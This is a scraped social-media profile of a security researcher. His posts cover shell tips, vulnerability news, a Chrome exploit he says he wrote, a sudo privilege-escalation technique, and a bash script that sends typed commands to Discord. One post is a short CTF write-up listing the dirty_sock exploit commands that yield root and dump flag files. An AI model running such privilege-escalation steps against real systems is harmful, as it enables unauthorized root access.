user avatar
chaignc - Sanson
@chaignc
I protected governments, hospitals, defense, and CAC40. Hacker AI - CEO: acquired in 2023.
France
Joined December 2013
  • Pinned
    user avatar
    I am excited to announce a new project, Hacker AI, an AI-powered tool that detects vulnerabilities in source code. Check it out at hacker-ai.online. Feedback is greatly appreciated.
  • user avatar
    In #linux shell <Ctrl+u> clears the line! $ whatever $ whatever<Ctrl+u> $ Tips: When you typo on password just <Ctrl+u> to reset the password entry. Works for tty, sudo, #bash, #zsh... Have a nice weekend. @nixcraft @commandlinefu @climagic @unixmen
  • user avatar
    Today learn agrep => approximative grep. Based on Levenshtein distances, it's possible to search for words looking alike a word. linux.die.net/man/1/agrep I'm using it for my personal note taking tools. Knowledge organisation is powerfull!! Cc @nixcraft @climagic
  • user avatar
    Use #vim to encypt your files with the :X command, don't forget to add 'set cm=blowfish2' to your vimrc for a better encryption. thx @nixcraft cc @MasteringVim #tweetips
  • user avatar
  • user avatar
    WHAT??? (remote) code execution when you convert a jpeg WHAT??? $ convert input.jpg output.gif #ImageMagick cc @Notfound404__ @Spriteware openwall.com/lists/oss-secu…
  • user avatar
    I just wrote a google chrome exploit!!!! :D A total 25 hours and 40 minutes of work, I learned so much.
  • user avatar
    WHAT??? RCE in the file_exists function of PHP! WHAT ??? github.com/s-n-t/presenta…
  • user avatar
    Last night I wrote magic amazing bash things that you want to try!! It automatically sends all typed command to your discord channel. I use this so my students can have a realtime copy of all my typed commands! gist.github.com/0a723189610837… cc @nixcraft @climagic
  • user avatar
    Writeup of how to get root in ten minutes and get all CTF flags. $ snap version 2.37.4 $ ./dirty_sockv2.py # @init_string github $ su dirty_sock $ sudo -i # id uid=0(root) gid=0(root) groups=0(root) # find -iname "flag*" -exec echo {} ';' -exec cat '{}' \; *** flags ***
  • user avatar
    I just released a new #linux privilege escalation technique abusing sudo at @BreizhCTF github.com/nongiach/sudo_… github.com/nongiach/sudo_…
  • user avatar
    From now on, here is how you will test your #shellcode !
  • user avatar
    Angora a new fuzzer that uses gradient descent instead theorem prover, it's way more efficient than AFL. Angora found 6, 52, 29, 40 and 48 new bugs in file, jhead, nm, objdump and size, respectively. arxiv.org/abs/1803.01307 #NewPaper
  • user avatar
    arm_now is an easy way to instantly setup and start a virtual machine within the cpu architecture that you want. ARM, PowerPc, MIPS, mios2, sh4, x86... github.com/nongiach/arm_n… cc @therealsaumil
    GIF